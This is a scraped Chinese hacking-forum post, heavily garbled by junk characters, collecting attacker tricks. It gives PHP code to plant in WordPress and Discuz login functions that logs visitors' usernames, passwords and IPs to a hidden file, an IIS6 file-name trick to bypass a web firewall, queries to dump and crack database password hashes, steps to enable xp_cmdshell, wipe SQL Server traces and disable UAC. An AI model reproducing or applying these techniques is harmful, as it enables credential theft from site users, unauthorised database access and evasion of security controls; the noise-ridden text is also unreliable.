/ i' G. s4 c$ j k* s, `3 g当action=login的时候会触发记录密码code,当然了你也可以在switch…case..语句中的default中写该代码。/ w8 X! U4 U9 H7 S4 S; @' |
就是搜索case ‘login’
7 {4 h" d; J6 E7 G在它下面直接插入即可,记录的密码生成在pwd.txt中,; k) ^. C1 [7 y0 ^# R* t
其实修改wp-login.php不是个好办法。容易被发现,还有其他的方法的,做个记录
! w7 G8 ?+ a* ]& s: Z利用II6文件解析漏洞绕过安全狗代码:
; i& h0 `* \& Y;antian365.asp;antian365.jpg
8 z* m {& S$ d- g. E
7 _" F- a8 d. Z% g: Q各种类型数据库抓HASH破解最高权限密码!
/ F$ n" d( v, D/ J8 u1.sql server20004 |+ R" {6 C. ^: Z; B2 ~7 u- i4 \
SELECT password from master.dbo.sysxlogins where name='sa'9 z0 o. N$ s. o* t5 V6 Y, W
0×010034767D5C0CFA5FDCA28C4A56085E65E882E71CB0ED250341
' I: E" ~3 H$ P# f2FD54D6119FFF04129A1D72E7C3194F7284A7F3A
" @' l5 S) j* u. w+ b% ~4 P5 f
2 A" m# t: T. `0 i/ R h0×0100- constant header/ ?. f1 @, x3 [
34767D5C- salt+ a1 b) a' ^. Q# }9 g2 P" K
0CFA5FDCA28C4A56085E65E882E71CB0ED250341- case senstive hash
. t- ~' Z8 \) i7 Z) A6 l2FD54D6119FFF04129A1D72E7C3194F7284A7F3A- upper case hash
" x n. O# I7 \4 t, V. Mcrack the upper case hash in ‘cain and abel’ and then work the case sentive hash
' z5 x9 @# E l/ a. jSQL server 2005:-/ V6 g. D9 _0 u
SELECT password_hash FROM sys.sql_logins where name='sa'; {. ]0 U! Z7 E- |& o, W" }$ K
0×0100993BF2315F36CC441485B35C4D84687DC02C78B0E680411F
" `# C8 m S8 d' R& H1 V0×0100- constant header
# \+ q% F) U. \3 b3 D2 j4 B& t993BF231-salt
4 }! i3 X% O7 O. l8 b9 w$ z6 K5F36CC441485B35C4D84687DC02C78B0E680411F- case sensitive hash
; o. m" i; {- Mcrack case sensitive hash in cain, try brute force and dictionary based attacks.' g5 I2 [+ |2 U+ R( J
% s. B+ a3 A' z3 ], Q; l' y
update:- following bernardo’s comments:-3 T" V g3 G3 v, N, E
use function fn_varbintohexstr() to cast password in a hex string.0 Q W! w3 t9 F3 s: S- W
e.g. select name from sysxlogins union all select master.dbo.fn_varbintohexstr(password)from sysxlogins$ b" W- d, I- d4 J4 ~1 G
0 b0 ]) [$ \7 p p. T
MYSQL:-
3 S( v m! |/ z: ?
3 _4 r, l: X8 V Q9 X4 rIn MySQL you can generate hashes internally using the password(), md5(), or sha1 functions. password() is the function used for MySQL’s own user authentication system. It returns a 16-byte string for MySQL versions prior to 4.1, and a 41-byte string (based on a double SHA-1 hash) for versions 4.1 and up. md5() is available from MySQL version 3.23.2 and sha1() was added later in 4.0.2.
# ]4 P# g m) T, _2 m! E
8 ~: E- L9 r- X8 q) O, s*mysql < 4.1
7 J4 ]( H" w1 m
. W6 v S4 q/ f3 H Amysql> SELECT PASSWORD(‘mypass’);" K8 g# M1 x! _" z* K( V: }
+——————–+! p U8 u r0 f. \4 D! h: E
| PASSWORD(‘mypass’) |
" d9 _' S2 Z% @7 _+——————–+: m, r4 o6 k9 u3 j- T1 p
| 6f8c114b58f2ce9e |
( K' K, |6 Z+ A/ w# o+——————–+: K% z4 X8 W J ~
|6 m0 l0 I. f) f! g
*mysql >=4.13 M# F7 X* y% _* O7 C# o/ W
% w, \7 H# Y: s* smysql> SELECT PASSWORD(‘mypass’);
( y9 ^3 i( G9 P. u" s+——————————————-+0 ~! Z. x. g3 x. f D
| PASSWORD(‘mypass’) |
+ U( i' i+ b2 w5 z* x+——————————————-+
4 ~( {+ j/ Z# {1 Q2 }" z' `3 ?| *6C8989366EAF75BB670AD8EA7A7FC1176A95CEF4 |$ D: i# _3 R+ ?: V a
+——————————————-+
# F! m1 u u, p# e8 I3 P- y2 @( M# A6 C& K# |, d
Select user, password from mysql.user
; g' P- b# m i/ a0 ~The hashes can be cracked in ‘cain and abel’/ f1 _) F+ Z! }! a8 E2 O
4 n+ h, a/ |" ~$ w
Postgres:-
- j1 u1 U* ^6 z' H6 c7 Q% iPostgres keeps MD5-based password hashes for database-level users in the pg_shadow table. You need to be the database superuser to read this table (usually called “postgres” or “pgsql”)- |9 f* |) H% ]6 S9 r+ Y
select usename, passwd from pg_shadow;" }1 k$ f! ?# _: c6 q7 ~
usename | passwd3 X( X% i" k& B9 r7 M& F O* K" `
——————+————————————-
4 T; [2 F. D" D, ~) I; atestuser | md5fabb6d7172aadfda4753bf0507ed4396) W: s: Q% d. S: S
use mdcrack to crack these hashes:-
) T' T0 x4 n) i/ |- ]$ wine MDCrack-sse.exe –algorithm=MD5 –append=testuser fabb6d7172aadfda4753bf0507ed43962 z& _ H0 J$ ~/ i* z3 D; W
3 h8 {, v$ B1 Z; v% MOracle:-
) |/ Q2 O. {: N& K$ ]select name, password, spare4 from sys.user$7 k" Y6 u6 u8 e* B9 t
hashes could be cracked using ‘cain and abel’ or thc-orakelcrackert11g4 } q$ W2 m! i2 l' Y
More on Oracle later, i am a bit bored….9 |" _% `( m& X& s1 V/ |7 e# Q
3 v% F9 p$ L! E) M, v9 O6 l( t# q6 h& C
在sql server2005/2008中开启xp_cmdshell I# w6 Z9 Q/ o2 e& K
-- To allow advanced options to be changed.
4 L; f' e2 _( K( N+ BEXEC sp_configure 'show advanced options', 1
+ L' @# @" a8 M# L! g5 {+ c1 `! nGO
i8 c: ?% c9 @% \# W8 k-- To update the currently configured value for advanced options.9 H2 d. c* H* I! ]& x- O4 n" q6 U6 y
RECONFIGURE3 B+ M8 i! X+ Y( Z f" w6 r
GO$ [3 b0 e$ p0 ?# h" w
-- To enable the feature.
% o5 `' H: X7 S" b! T" MEXEC sp_configure 'xp_cmdshell', 1
" z @0 `$ Q1 FGO6 u7 N( y; J8 v3 l8 y! `
-- To update the currently configured value for this feature.
) L! J+ U3 j' F" SRECONFIGURE3 i* H$ i% s! `' q, @9 }0 u9 m
GO
( _+ D, P) A3 b! K: g rSQL 2008 server日志清除,在清楚前一定要备份。
& H; C0 }8 G: n如果Windows Server 2008 标准版安装SQL Express 2008,则在这里删除:
2 T z& j+ j: `- u- d' z" H9 b) HX:\Users[SomeUser]\AppData\Roaming\Microsoft\Microsoft SQL Server\100\Tools\Shell\SqlStudio.bin
' g% j; D" X @4 R
' K; p4 I. V9 L$ X对于SQL Server 2008以前的版本:! F& {4 J4 }* S+ D6 T
SQL Server 2005:
/ m( ^5 j& V- _. |5 q2 G5 I删除X:\Documents and Settings\XXX\Application Data\Microsoft\Microsoft SQL Server\90\Tools\Shell\mru.dat
1 `4 p1 d2 x6 q NSQL Server 2000:( e G' u" z, e- t4 e, C5 I# g: P
清除注册表HKEY_CURRENT_USER\Software\Microsoft\Microsoft SQL Server\80\Tools\Client\PrefServers\相应的内容即可。6 H7 S, T4 I6 z, [) B8 Q& Z2 b0 }* j
( Y8 q; n# E+ p5 |; O
本帖最后由 simeon 于 2013-1-3 09:51 编辑' d- K$ K0 R4 i! T. v) F# \+ x5 k8 c4 i- [
& s2 w& ^! S, i; w% j. y
+ @% T& U3 D! ^" N% P; o: Q/ uwindows 2008 文件权限修改
4 u3 t. }+ U" ^' C5 W% t4 t5 u H1.http://technet.microsoft.com/zh- ... 4%28v=ws.10%29.aspx
5 m- R. `) X% |. @9 H( O: I2.http://hi.baidu.com/xiaobei713/item/b0cfae38f6bd278df5e4ad98: q& ~7 }# D1 p3 M
一、先在右键菜单里面看看有没有“管理员取得所有权”,没有“管理员取得所有权”,( D" r1 f8 G; L$ Q: }
% J. |% A( a; m8 \
Windows Registry Editor Version 5.00
% g4 O" Y- @. W2 N/ Q8 ~* V1 ~[HKEY_CLASSES_ROOT\*\shell\runas]
: K8 j j6 A- K6 ?% I k@="管理员取得所有权". T$ f: y6 x% J# E+ Y
"NoWorkingDirectory"=""
/ K* B( {9 o+ G7 x, h! ^[HKEY_CLASSES_ROOT\*\shell\runas\command]
) H1 s' T8 @. \8 F1 d@="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"
! ?/ z: V7 z5 h F, z! R"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"/ K. z% n# k' h+ ^) o+ T
[HKEY_CLASSES_ROOT\exefile\shell\runas2]
: g+ V) B& [, W) c1 v@="管理员取得所有权"+ n3 L {! f6 D: j4 F
"NoWorkingDirectory"=""7 q1 f7 X8 g6 C5 j' u; _+ e6 d" H
[HKEY_CLASSES_ROOT\exefile\shell\runas2\command]
) x% f0 B! H3 C/ ^8 Y$ Y1 P@="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"9 @8 e! S \$ a# {
"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"7 Q* s, K3 ~( c3 P2 k
! h; C' G; y9 }# `2 u& ?
[HKEY_CLASSES_ROOT\Directory\shell\runas]$ b; s. t6 W+ R5 b
@="管理员取得所有权"
; s1 n8 N3 N' l* P' L"NoWorkingDirectory"=""
& u3 R; g z) Q |- Z8 P[HKEY_CLASSES_ROOT\Directory\shell\runas\command]9 W+ r9 N* ?2 f2 U9 j. R
@="cmd.exe /c takeown /f \"%1\" /r /d y && icacls \"%1\" /grant administrators:F /t"
4 P( w5 D) W+ K& Y"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" /r /d y && icacls \"%1\" /grant administrators:F /t"5 C+ V$ p1 Z+ i8 |6 W* l% f7 k# Z
" c0 q1 k' h$ Y
% L p6 g$ x* n
win7右键“管理员取得所有权”.reg导入" Y; G% S3 ~+ @& A; X
二、在C:\Windows目录里下搜索“notepad.exe”文件,应该会搜索到四个“notepad.exe”和四个“notepad.exe.mui”,
4 A! ?) {& k/ c H# z( L* W2 N, p2 ~1、C:\Windows这个路径的“notepad.exe”不需要替换* A. Q# ]" Y2 S" p% P7 g+ Z
2、C:\Windows\System32这个路径的“notepad.exe”不需要替换7 U$ ?1 F% H' d4 a3 f3 p2 }
3、四个“notepad.exe.mui”不要管! C6 t |: ]1 x7 O) U* G. j
4、主要替换C:\Windows\winsxs\x86_microsoft-windows-notepad_31bf3856ad364e35_6.1.7600.16385_none_6ef0e39ed15350e4和; M& j# J: s9 ^. O( p4 ]
C:\Windows\winsxs\x86_microsoft-windows-notepadwin_31bf3856ad364e35_6.1.7600.16385_none_42a023025c60a33a两个文件下的“notepad.exe”/ s4 X* S3 y" |! E. Q* U9 M
替换方法先取得这两个文件夹的管理员权限,然后把“Notepad2.exe”重命名为“notepad.exe”替换到这两个文件夹下面,
t$ C# k5 u s& `% S; p替换完之后回到桌面,新建一个txt文档打开看看是不是变了。( R! @' I& Y6 R- p+ c, z$ V) _
windows 2008中关闭安全策略:
/ x/ l5 c% D3 q) ^7 D" rreg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f7 k) D" }% w" |6 h
修改uc_client目录下的client.php 在" W! S7 D: r1 W, g) g
function uc_user_login($username, $password, $isuid = 0, $checkques = 0, $questionid = '', $answer = '') {
, {, Q6 ^ _4 U; c0 U下加入如上代码,在网站./data/cache/目录下自动生成csslog.php
7 O; ~; ?; j, s: |2 \/ P- \8 t& \你可以在ipdata目录下添加 view.php 可以用来查看记录的,密码为:falw
% D/ }+ U, M3 U$ P" rif(getenv('HTTP_CLIENT_IP')) {7 Q% D$ C/ |; K5 z8 d
$onlineip = getenv('HTTP_CLIENT_IP');
1 a ?" W4 c4 _! {7 D' y} elseif(getenv('HTTP_X_FORWARDED_FOR')) {
, ]0 n4 _- T$ e0 s' [$onlineip = getenv('HTTP_X_FORWARDED_FOR');6 O+ x1 k K! b% @7 n/ J
} elseif(getenv('REMOTE_ADDR')) {0 ]! ~; a1 W, S, i6 }
$onlineip = getenv('REMOTE_ADDR');7 ^4 z/ v* y' e6 Z6 n
} else {/ X0 U. d+ Q0 U" }$ D6 d* s
$onlineip = $HTTP_SERVER_VARS['REMOTE_ADDR'];
) R% p$ j# v ?3 Y/ V, O}; X( `( E7 {9 D
$showtime=date("Y-m-d H:i:s");
& }* J5 `2 `) Q/ g' g5 _" o $record="<?exit();?>用户:".$username." 密码:".$password." IP:".$onlineip." Time:".$showtime."\r\n";
0 z Q. r- R& H $handle=fopen('./data/cache/csslog.php','a+');' C8 |( A% F( Z. g
$write=fwrite($handle,$record); |
发表于 2013-2-27 21:24:42
收藏
支持
反对